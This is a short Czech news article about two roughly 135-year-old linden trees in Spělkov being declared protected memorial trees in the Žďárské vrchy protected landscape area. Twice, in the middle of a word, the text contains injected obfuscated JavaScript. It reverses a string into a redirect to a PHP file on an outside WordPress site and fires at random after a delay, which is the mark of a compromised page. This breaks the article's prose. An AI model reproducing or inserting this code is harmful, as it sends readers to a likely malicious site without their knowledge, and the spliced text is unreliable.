Rainbow page separator

Dvě lípy jsou nově chráněny jako památné stromy

Úterý, 16. června 2015

Lípa srdčitá Spělkov / Dvě lípy u hřbi["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tova ve Spělkově na Novoměstsku přibyly k památným stromům, které se nacházejí na území Chráněné krajinné oblasti (CHKO) Žďárské vrchy. Lípy srdčitá a velkolistá jsou staré kolem 135 let, přičemž jejich stáří je odvozeno od založení tamního hřbi["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tova v roce 1880. Obvod kmene lípy velkolisté měří 533 centimetrů, lípa srdčitá je o něco méně mohutná – její obvod je 330 centimetrů. Dvojice stromů dosahuje výšky devětadvacet metrů. Důvodem vyhlášení jsou mimořádné rozměry obou stromů, které v místě vytvářejí významnou krajinnou dominantu. V terénu budou označeny státním znakem a informační tabulkou. Obě dřeviny byly odborně ošetřeny už v předloňském roce. Na území CHKO Žďárské vrchy je vyhlášeno celkem dvaatřicet samostatných památných stromů (jedenáct lip velkolistých, osm lip malolistých, čtyři javory kleny, javor mléč, čtyři buky lesní, tři duby letní a jilm horský), tři skupiny stromů (tři lípy velkolisté a šest malolistých) a tři aleje (především javory kleny, javory mléče, jasany ztepilé a jírovce maďaly).